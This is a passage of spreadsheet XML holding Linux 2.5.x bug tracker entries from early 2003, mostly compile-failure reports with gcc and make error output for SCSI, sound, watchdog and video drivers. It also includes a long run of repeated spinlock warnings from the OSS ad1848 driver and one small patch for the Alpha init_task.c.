    <t>Compile error. gcc -Wp,-MD,drivers/scsi/.imm.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=imm -DKBUILD_MODNAME=imm -c -o drivers/scsi/.tmp_imm.o drivers/scsi/imm.c drivers/scsi/imm.c: In function `imm_send_command': drivers/scsi/imm.c:736: structure has no member named `host' drivers/scsi/imm.c: In function `imm_completion': drivers/scsi/imm.c:761: structure has no member named `host' drivers/scsi/imm.c: In function `imm_command': drivers/scsi/imm.c:848: structure has no member named `host' drivers/scsi/imm.c:870: structure has no member named `host' drivers/scsi/imm.c: In function `imm_interrupt': drivers/scsi/imm.c:886: structure has no member named `host' drivers/scsi/imm.c:933: structure has no member named `host' drivers/scsi/imm.c:935: structure has no member named `host' drivers/scsi/imm.c: In function `imm_engine': drivers/scsi/imm.c:946: structure has no member named `host' drivers/scsi/imm.c:975: structure has no member named `target' drivers/scsi/imm.c: In function `imm_queuecommand': drivers/scsi/imm.c:1085: structure has no member named `host' drivers/scsi/imm.c: In function `imm_abort': drivers/scsi/imm.c:1128: structure has no member named `host' drivers/scsi/imm.c: In function `imm_reset': drivers/scsi/imm.c:1160: structure has no member named `host' make[2]: *** [drivers/scsi/imm.o] Error 1 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2</t>
  </si>
  <si>
    <t>OSS CS4232 nasty spinlock printks on boot</t>
  </si>
  <si>
    <t>2.5.59-bk4</t>
  </si>
  <si>
    <t>2003-02-10 09:51 UTC</t>
  </si>
  <si>
    <t>2003-02-21 04:43 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: single x86, onboard CS4232 Software Environment: Problem Description: On boot, I get these messages: serio: i8042 KBD port at 0x60,0x64 irq 1 sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:236: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:249: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:266: spin_is_locked on uninitialized spinlock c045f640. sound/oss/ad1848.c:219: spin_lock(sound/oss/ad1848.c:c045f640) already locked by sound/oss/ad1848.c /351 sound/oss/ad1848.c:367: spin_unlock(sound/oss/ad1848.c:c045f640) not locked ad1848/cs4248 codec driver Copyright (C) by Hannu Savolainen 1993-1996 ad1848: No ISAPnP cards found, trying standard ones... Sound still works. bwindle@razor:~$ grep c045f640 /giant/linux/System.map c045f640 b adev_info Steps to reproduce: CONFIG_SOUND_GAMEPORT=y CONFIG_SOUND=y CONFIG_SOUND_PRIME=y CONFIG_SOUND_OSS=y CONFIG_SOUND_CS4232=y</t>
  </si>
  <si>
    <t>typo in arch/alpha/kernel/signal.c</t>
  </si>
  <si>
    <t>2.5.60</t>
  </si>
  <si>
    <t>2003-02-10 23:08 UTC</t>
  </si>
  <si>
    <t>2003-03-06 12:13 UTC</t>
  </si>
  <si>
    <t>missing init in arch/alpha/kernel/init_task.c</t>
  </si>
  <si>
    <t>2003-02-10 23:12 UTC</t>
  </si>
  <si>
    <t>2003-03-06 12:14 UTC</t>
  </si>
  <si>
    <t>Distribution: redhat Hardware Environment: 164LX Software Environment: rawhide Problem Description: failed to init an sighandler in signal change. Steps to reproduce: compile Patch: *** a/arch/alpha/kernel/init_task.c.old 2003-02-10 22:41:14.000000000 -0800 --- b/arch/alpha/kernel/init_task.c 2003-02-10 22:40:01.000000000 -0800 *************** *** 10,13 **** --- 10,14 ---- static struct files_struct init_files = INIT_FILES; static struct signal_struct init_signals = INIT_SIGNALS(init_signals); + static struct sighand_struct init_sighand = INIT_SIGHAND(init_sighand); struct mm_struct init_mm = INIT_MM(init_mm); struct task_struct init_task = INIT_TASK(init_task);</t>
  </si>
  <si>
    <t>sb_card.c compile error</t>
  </si>
  <si>
    <t>2003-02-11 01:22 UTC</t>
  </si>
  <si>
    <t>2003-02-25 08:35 UTC</t>
  </si>
  <si>
    <t>Compile error: make -f scripts/Makefile.build obj=sound/oss gcc -Wp,-MD,sound/oss/.sb_card.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DMODULE -DKBUILD_BASENAME=sb_card -DKBUILD_MODNAME=sb -c -o sound/oss/.tmp_sb_card.o sound/oss/sb_card.c sound/oss/sb_card.c: In function `activate_dev': sound/oss/sb_card.c:744: structure has no member named `active' sound/oss/sb_card.c:747: structure has no member named `activate' sound/oss/sb_card.c:750: structure has no member named `deactivate' sound/oss/sb_card.c: In function `sb_init': sound/oss/sb_card.c:761: warning: implicit declaration of function `isapnp_find_dev' sound/oss/sb_card.c:761: warning: assignment makes pointer from integer without a cast sound/oss/sb_card.c:764: structure has no member named `prepare' sound/oss/sb_card.c:791: warning: assignment makes pointer from integer without a cast sound/oss/sb_card.c:792: structure has no member named `prepare' sound/oss/sb_card.c:821: warning: assignment makes pointer from integer without a cast sound/oss/sb_card.c:823: structure has no member named `prepare' sound/oss/sb_card.c: In function `sb_isapnp_probe': sound/oss/sb_card.c:893: warning: implicit declaration of function `isapnp_find_card' sound/oss/sb_card.c:896: warning: assignment makes pointer from integer without a cast sound/oss/sb_card.c: In function `cleanup_sb': sound/oss/sb_card.c:1007: structure has no member named `deactivate' sound/oss/sb_card.c:1009: structure has no member named `deactivate' sound/oss/sb_card.c:1011: structure has no member named `deactivate' make[2]: *** [sound/oss/sb_card.o] Error 1 make[1]: *** [sound/oss] Error 2 make: *** [sound] Error 2</t>
  </si>
  <si>
    <t>build breakage for module versioning support</t>
  </si>
  <si>
    <t>2.5.60, 2.5.60-bk1</t>
  </si>
  <si>
    <t>2003-02-11 07:10 UTC</t>
  </si>
  <si>
    <t>2003-02-12 23:13 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.60, 2.5.60-bk1 Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: Enabling module versioning support causes build breakage. gcc -Wp,-MD,arch/i386/kernel/.time.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=time -DKBUILD_MODNAME=time -c -o arch/i386/kernel/.tmp_time.o arch/i386/kernel/time.c ld:arch/i386/kernel/.tmp_time.ver:1: parse error make[1]: *** [arch/i386/kernel/time.o] Error 1 make: *** [arch/i386/kernel] Error 2 Steps to reproduce: CONFIG_MODVERSIONS=y Loadable module support ---&gt; [*] Module versioning support (EXPERIMENTAL)</t>
  </si>
  <si>
    <t>compile failure in drivers/block/cciss_scsi.c</t>
  </si>
  <si>
    <t>2.5.60-bk1</t>
  </si>
  <si>
    <t>2003-02-11 07:26 UTC</t>
  </si>
  <si>
    <t>2005-07-05 12:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/block/.cciss.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=cciss -DKBUILD_MODNAME=cciss -c -o drivers/block/cciss.o drivers/block/cciss.c In file included from drivers/block/cciss.c:136: drivers/block/cciss_scsi.c: In function `cciss_scsi_proc_info': drivers/block/cciss_scsi.c:1265: warning: unused variable `found' In file included from drivers/block/cciss.c:136: drivers/block/cciss_scsi.c: In function `cciss_scsi_queue_command': drivers/block/cciss_scsi.c:1382: structure has no member named `host' drivers/block/cciss_scsi.c:1385: structure has no member named `channel' drivers/block/cciss_scsi.c:1385: structure has no member named `target' drivers/block/cciss_scsi.c:1385: structure has no member named `lun' make[2]: *** [drivers/block/cciss.o] Error 1 make[1]: *** [drivers/block] Error 2 make: *** [drivers] Error 2 Steps to reproduce: CONFIG_BLK_CPQ_CISS_DA=y Block devices ---&gt; &lt;*&gt; Compaq Smart Array 5xxx suppor</t>
  </si>
  <si>
    <t>compile failure in drivers/char/watchdog/sc1200wdt.c</t>
  </si>
  <si>
    <t>2003-02-11 07:54 UTC</t>
  </si>
  <si>
    <t>2003-02-12 22:07 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/char/watchdog/.sc1200wdt.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=sc1200wdt -DKBUILD_MODNAME=sc1200wdt -c -o drivers/char/watchdog/sc1200wdt.o drivers/char/watchdog/sc1200wdt.c drivers/char/watchdog/sc1200wdt.c: In function `sc1200wdt_isapnp_probe': drivers/char/watchdog/sc1200wdt.c:338: warning: implicit declaration of function `isapnp_find_dev' drivers/char/watchdog/sc1200wdt.c:338: warning: assignment makes pointer from integer without a cast drivers/char/watchdog/sc1200wdt.c:342: structure has no member named `prepare' drivers/char/watchdog/sc1200wdt.c:352: structure has no member named `activate' drivers/char/watchdog/sc1200wdt.c: In function `sc1200wdt_init': drivers/char/watchdog/sc1200wdt.c:426: structure has no member named `deactivate' drivers/char/watchdog/sc1200wdt.c: In function `sc1200wdt_exit': drivers/char/watchdog/sc1200wdt.c:439: structure has no member named `deactivate' make[3]: *** [drivers/char/watchdog/sc1200wdt.o] Error 1 make[2]: *** [drivers/char/watchdog] Error 2 make[1]: *** [drivers/char] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Character devices ---&gt; Watchdog Cards ---&gt; &lt;*&gt; National Semiconductor PC87307/PC97307 (ala SC1200) Watchdog CONFIG_SC1200_WDT=y</t>
  </si>
  <si>
    <t>compile failure in drivers/media/video/saa5249.c</t>
  </si>
  <si>
    <t>2003-02-11 08:25 UTC</t>
  </si>
  <si>
    <t>2003-02-13 19:27 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/media/video/.saa5249.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=saa5249 -DKBUILD_MODNAME=saa5249 -c -o drivers/media/video/saa5249.o drivers/media/video/saa5249.c drivers/media/video/saa5249.c:257: warning: initialization from incompatible pointer type drivers/media/video/saa5249.c:258: warning: missing braces around initializer drivers/media/video/saa5249.c:258: warning: (near initialization for `i2c_driver_videotext.name') drivers/media/video/saa5249.c:260: warning: initialization makes integer from pointer without a cast drivers/media/video/saa5249.c:260: initializer element is not computable at load time drivers/media/video/saa5249.c:260: (near initialization for `i2c_driver_videotext.name[2]') drivers/media/video/saa5249.c:261: warning: initialization makes integer from pointer without a cast drivers/media/video/saa5249.c:261: initializer element is not computable at load time drivers/media/video/saa5249.c:261: (near initialization for `i2c_driver_videotext.name[3]') drivers/media/video/saa5249.c:263: warning: initialization makes integer from pointer without a cast drivers/media/video/saa5249.c:263: initializer element is not computable at load time drivers/media/video/saa5249.c:263: (near initialization for `i2c_driver_videotext.name[4]') drivers/media/video/saa5249.c:263: initializer element is not constant drivers/media/video/saa5249.c:263: (near initialization for `i2c_driver_videotext.name') make[3]: *** [drivers/media/video/saa5249.o] Error 1 make[2]: *** [drivers/media/video] Error 2 make[1]: *** [drivers/media] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Multimedia devices ---&gt; Video For Linux ---&gt; &lt;*&gt; SAA5249 Teletext processor CONFIG_VIDEO_SAA5249=y</t>
  </si>
  <si>
    <t>compile failure in drivers/media/video/saa7110.c</t>
  </si>
  <si>
    <t>2003-02-11 08:51 UTC</t>
  </si>
  <si>
    <t>2003-02-13 19:28 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/media/video/.saa7110.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=saa7110 -DKBUILD_MODNAME=saa7110 -c -o drivers/media/video/saa7110.o drivers/media/video/saa7110.c drivers/media/video/saa7110.c:384: warning: initialization from incompatible pointer type drivers/media/video/saa7110.c:385: warning: missing braces around initializer drivers/media/video/saa7110.c:385: warning: (near initialization for `i2c_driver_saa7110.name') drivers/media/video/saa7110.c:387: warning: initialization makes integer from pointer without a cast drivers/media/video/saa7110.c:387: initializer element is not computable at load time drivers/media/video/saa7110.c:387: (near initialization for `i2c_driver_saa7110.name[2]') drivers/media/video/saa7110.c:388: warning: initialization makes integer from pointer without a cast drivers/media/video/saa7110.c:388: initializer element is not computable at load time drivers/media/video/saa7110.c:388: (near initialization for `i2c_driver_saa7110.name[3]') drivers/media/video/saa7110.c:390: warning: initialization makes integer from pointer without a cast drivers/media/video/saa7110.c:390: initializer element is not computable at load time drivers/media/video/saa7110.c:390: (near initialization for `i2c_driver_saa7110.name[4]') drivers/media/video/saa7110.c:390: initializer element is not constant drivers/media/video/saa7110.c:390: (near initialization for `i2c_driver_saa7110.name') make[3]: *** [drivers/media/video/saa7110.o] Error 1 make[2]: *** [drivers/media/video] Error 2 make[1]: *** [drivers/media] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Multimedia devices ---&gt; Video For Linux ---&gt; &lt;*&gt; Zoran ZR36057/36060 Video For Linux &lt;*&gt; Miro DC10(+) support CNFIG_VIDEO_ZORAN_DC10=y</t>
  </si>
  <si>
    <t>compile failure in drivers/media/video/tuner-3036.c</t>
  </si>
  <si>
    <t>2003-02-11 09:06 UTC</t>
  </si>
  <si>
    <t>2003-02-14 19:19 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/media/video/.tuner-3036.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=tuner_3036 -DKBUILD_MODNAME=tuner_3036 -c -o drivers/media/video/tuner-3036.o drivers/media/video/tuner-3036.c drivers/media/video/tuner-3036.c:188: warning: initialization from incompatible pointer type drivers/media/video/tuner-3036.c:189: warning: missing braces around initializer drivers/media/video/tuner-3036.c:189: warning: (near initialization for `i2c_driver_tuner.name') drivers/media/video/tuner-3036.c:191: warning: initialization makes integer from pointer without a cast drivers/media/video/tuner-3036.c:191: initializer element is not computable at load time drivers/media/video/tuner-3036.c:191: (near initialization for `i2c_driver_tuner.name[2]') drivers/media/video/tuner-3036.c:192: warning: initialization makes integer from pointer without a cast drivers/media/video/tuner-3036.c:192: initializer element is not computable at load time drivers/media/video/tuner-3036.c:192: (near initialization for `i2c_driver_tuner.name[3]') drivers/media/video/tuner-3036.c:194: warning: initialization makes integer from pointer without a cast drivers/media/video/tuner-3036.c:194: initializer element is not computable at load time drivers/media/video/tuner-3036.c:194: (near initialization for `i2c_driver_tuner.name[4]') drivers/media/video/tuner-3036.c:194: initializer element is not constant drivers/media/video/tuner-3036.c:194: (near initialization for `i2c_driver_tuner.name') make[3]: *** [drivers/media/video/tuner-3036.o] Error 1 make[2]: *** [drivers/media/video] Error 2 make[1]: *** [drivers/media] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Multimedia devices ---&gt; Video For Linux ---&gt; &lt;*&gt; SAB3036 tuner CONFIG_TUNER_3036=y</t>
  </si>
  <si>
    <t>compile failure in drivers/message/i2o/i2o_scsi.c</t>
  </si>
  <si>
    <t>I2O</t>
  </si>
  <si>
    <t>2003-02-11 09:19 UTC</t>
  </si>
  <si>
    <t>2003-02-14 19:24 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/message/i2o/.i2o_scsi.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=i2o_scsi -DKBUILD_MODNAME=i2o_scsi -c -o drivers/message/i2o/i2o_scsi.o drivers/message/i2o/i2o_scsi.c drivers/message/i2o/i2o_scsi.c: In function `i2o_scsi_reply': drivers/message/i2o/i2o_scsi.c:227: structure has no member named `host' drivers/message/i2o/i2o_scsi.c:331: structure has no member named `host' drivers/message/i2o/i2o_scsi.c: In function `i2o_scsi_queuecommand': drivers/message/i2o/i2o_scsi.c:609: structure has no member named `host' drivers/message/i2o/i2o_scsi.c:618: structure has no member named `target' drivers/message/i2o/i2o_scsi.c:620: structure has no member named `target' drivers/message/i2o/i2o_scsi.c:624: structure has no member named `target' drivers/message/i2o/i2o_scsi.c:624: structure has no member named `lun' drivers/message/i2o/i2o_scsi.c:715: structure has no member named `target' drivers/message/i2o/i2o_scsi.c:715: structure has no member named `lun' drivers/message/i2o/i2o_scsi.c:718: structure has no member named `target' drivers/message/i2o/i2o_scsi.c:718: structure has no member named `lun' drivers/message/i2o/i2o_scsi.c: In function `i2o_scsi_abort': drivers/message/i2o/i2o_scsi.c:919: structure has no member named `host' drivers/message/i2o/i2o_scsi.c:921: structure has no member named `target' drivers/message/i2o/i2o_scsi.c:921: structure has no member named `lun' drivers/message/i2o/i2o_scsi.c: In function `i2o_scsi_bus_reset': drivers/message/i2o/i2o_scsi.c:985: structure has no member named `host' make[3]: *** [drivers/message/i2o/i2o_scsi.o] Error 1 make[2]: *** [drivers/message/i2o] Error 2 make[1]: *** [drivers/message] Error 2 make: *** [drivers] Error 2 Steps to reproduce: I2O device support ---&gt; &lt;*&gt; I2O support &lt;*&gt; I2O SCSI OSM CONFIG_I2O=y CONFIG_I2O_SCSI=y</t>
  </si>
  <si>
    <t>compile failure in drivers/scsi/inia100.c</t>
  </si>
  <si>
    <t>2003-02-11 12:31 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/scsi/.inia100.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=inia100 -DKBUILD_MODNAME=a100u2w -c -o drivers/scsi/inia100.o drivers/scsi/inia100.c drivers/scsi/inia100.c: In function `inia100AppendSRBToQueue': drivers/scsi/inia100.c:151: structure has no member named `next' drivers/scsi/inia100.c:155: structure has no member named `next' drivers/scsi/inia100.c: In function `inia100PopSRBFromQueue': drivers/scsi/inia100.c:174: structure has no member named `next' drivers/scsi/inia100.c:175: structure has no member named `next' make[2]: *** [drivers/scsi/inia100.o] Error 1 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2 Steps to reproduce: SCSI device support ---&gt; SCSI low-level drivers ---&gt; &lt;*&gt; Initio INI-A100U2W support CONFIG_SCSI_INIA100=y</t>
  </si>
  <si>
    <t>compile failure in drivers/scsi/cpqfcTSinit.c</t>
  </si>
  <si>
    <t>2003-02-11 12:37 UTC</t>
  </si>
  <si>
    <t>Chase Maupin</t>
  </si>
  <si>
